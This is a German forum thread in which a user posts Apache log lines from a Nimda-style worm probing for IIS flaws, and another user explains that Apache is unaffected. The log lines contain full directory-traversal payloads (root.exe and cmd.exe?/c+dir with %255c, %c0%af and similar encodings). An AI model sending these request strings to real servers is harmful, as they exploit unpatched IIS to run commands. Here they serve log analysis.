Apache-Logs

PChristoph · 3. Mai 2002 um 19:20

Hallo!!

Ich hab da in meinem Apache Logfile folgende Zeilen gefunden. Das deutet auf Anfragen auf Windows hin. Was wollte der „Angreifer“??

xx.xx.115.166 - - [02/May/2002:21:49:22 +0100] „GET /scripts/root.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:29 +0100] „GET /MSADC/root.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:31 +0100] „GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:34 +0100] „GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:37 +0100] „GET /scripts/…%255c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:42 +0100] „GET /_vti_bin/…%255c…/…%255c…/…%255c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:45 +0100] „GET /_mem_bin/…%255c…/…%255c…/…%255c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:47 +0100] „GET /msadc/…%255c…/…%255c…/…%255c/…%c1%1c…/…%c1%1c…/…%c1%1c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:49 +0100] „GET /scripts/…%c1%1c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:52 +0100] „GET /scripts/…%c0%2f…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:55 +0100] „GET /scripts/…%c0%af…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:57 +0100] „GET /scripts/…%c1%9c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:50:00 +0100] „GET /scripts/…%%35%63…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 400 690
xx.xx.115.166 - - [02/May/2002:21:50:03 +0100] „GET /scripts/…%%35c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 400 690
xx.xx.115.166 - - [02/May/2002:21:50:05 +0100] „GET /scripts/…%25%35%63…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:50:07 +0100] „GET /scripts/…%252f…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763

Sebastian · 3. Mai 2002 um 19:42

Ich hab da in meinem Apache Logfile folgende Zeilen gefunden.
Das deutet auf Anfragen auf Windows hin. Was wollte der
„Angreifer“??

Der Angreifer hatte einen MS IE installiert und sich darauf einen Virus/Wurm eingefangen.

Ich denke, es war Nimda.

Für Dich ist das kein Problem sondern für den, den Du als „Angreifer“ bezeichtest. Das ist der Trottel, der seine Programme nicht im Griff hat.

Sebastian

PChristoph · 3. Mai 2002 um 22:18

Hallo!

Wieso kann das für mich kein Problem sein? Ich hab den Apache auf Windows 2000 (ich weiss, Schande über mich) installiert. kann er da nichts kaputt machen?

mfg
chris

Der Angreifer hatte einen MS IE installiert und sich darauf
einen Virus/Wurm eingefangen.

Ich denke, es war Nimda.

Für Dich ist das kein Problem sondern für den, den Du als
„Angreifer“ bezeichtest. Das ist der Trottel, der seine
Programme nicht im Griff hat.

Sebastian

Sebastian · 3. Mai 2002 um 23:23

Wieso kann das für mich kein Problem sein? Ich hab den Apache
auf Windows 2000 (ich weiss, Schande über mich) installiert.
kann er da nichts kaputt machen?

Apache ist gegen Nimda und CodeRed immun. Unabhängig vom Betriebssystem.

Ein unixoides System sei dannoch empfohlen…

Sebastian

PChristoph · 4. Mai 2002 um 18:53

Wieso kann das für mich kein Problem sein? Ich hab den Apache
auf Windows 2000 (ich weiss, Schande über mich) installiert.
kann er da nichts kaputt machen?

Apache ist gegen Nimda und CodeRed immun. Unabhängig vom
Betriebssystem.

aso

Ein unixoides System sei dannoch empfohlen…

das weiss ich auch, normalerweise hab ich das auf Linux aber mein Freund wollt ‚unbedingt‘ das auf seinem Rechner haben. Naja, wenn er glaubt…

mfg
chris